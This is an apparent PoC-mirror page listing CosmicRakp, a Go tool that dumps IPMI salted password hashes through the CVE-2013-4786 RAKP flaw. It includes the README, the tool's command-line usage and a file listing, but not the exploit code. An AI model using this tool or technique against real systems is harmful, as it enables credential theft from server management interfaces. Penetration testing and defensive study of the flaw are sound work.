CVE-2013-4786 PoC — Intelligent Platform Management Interface 信任管理问题漏洞

Source

https://github.com/fin3ss3g0d/CosmicRakp

Associated Vulnerability

Title:Intelligent Platform Management Interface 信任管理问题漏洞 (CVE-2013-4786)
Description:Intelligent Platform Management Interface（IPMI,智能平台管理接口）是一种Intel架构的企业系统的周边设备所采用的一种工业标准。IPMI亦是一个开放的免费标准，用户无需支付额外的费用即可使用此标准。IPMI 能够横跨不同的操作系统、固件和硬件平台，可以智能的监控、控制和自动回报大量服务器的运作状况，以降低服务器系统成本。 Intelligent Platform Management Interface（IPMI,智能平台管理接口）2.0版本规范支持的RMCP

Description

CVE-2013-4786 Go exploitation tool

Readme

# CosmicRakp

![Thanos Image](./thanos.jpg)

## Table of Contents

- [Introduction](#introduction)
- [CVE-2013-4786](#cve-2013-4786)
- [Installation](#installation)
- [Usage](#usage)
- [Credits](#credits)
- [License](#license)

## Introduction

CosmicRakp is a powerful tool written in Go that allows red teamers and penetration testers to dump IPMI hashes. This project aims to be efficient, fast, and easy to use.

## CVE-2013-4786

This tool exploits the vulnerability detailed in CVE-2013-4786, which allows unauthorized users to retrieve salted password hashes from IPMI devices via the RAKP (Remote Authentication Key Protocol) mechanism. This is achieved by initiating an IPMI 2.0 RAKP authentication process with a cipher suite that enables 'None' authentication, allowing the retrieval of salted password hashes.

## Installation

```bash
./build.sh
```

## Usage

```go
❯ ./cosmicrakp -h
Usage of ./cosmicrakp:
  -debug
    	enable debug mode
  -max-attempts int
    	maximum number of attempts to open a session (default 3)
  -mode string
    	mode of operation: 'range' or 'file' (default "range")
  -output string
    	File to store output results (default "output.txt")
  -range string
    	IP range for 'range' mode
  -retry-delay duration
    	time to wait between retries (in seconds) (default 2s)
  -targets string
    	target file for 'file' mode
  -threads int
    	number of threads for concurrent execution (default 4)
  -usernames string
    	File containing usernames to test (default "users.txt")
```


### Credits

This project is inspired by and pays homage to one of the original (if not the original) proof-of-concept for exploiting CVE-2013-4786. The PoC was developed by Dan Farmer and is a part of the Metasploit Framework. You can find the original code [here](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ipmi/ipmi_dumphashes.rb).

### License

This project uses the MIT license.

File Snapshot


 [4.0K]  /data/pocs/ebd2ef133a56ba8f68fe74537d0a1d70362326af
├── [  65]  build.sh
├── [4.0K]  ipmi
│   └── [ 11K]  ipmi.go
├── [1.0K]  LICENSE
├── [7.6K]  main.go
├── [1.9K]  README.md
├── [194K]  thanos.jpg
├── [  50]  users.txt
└── [4.0K]  util
    └── [2.2K]  util.go

2 directories, 8 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!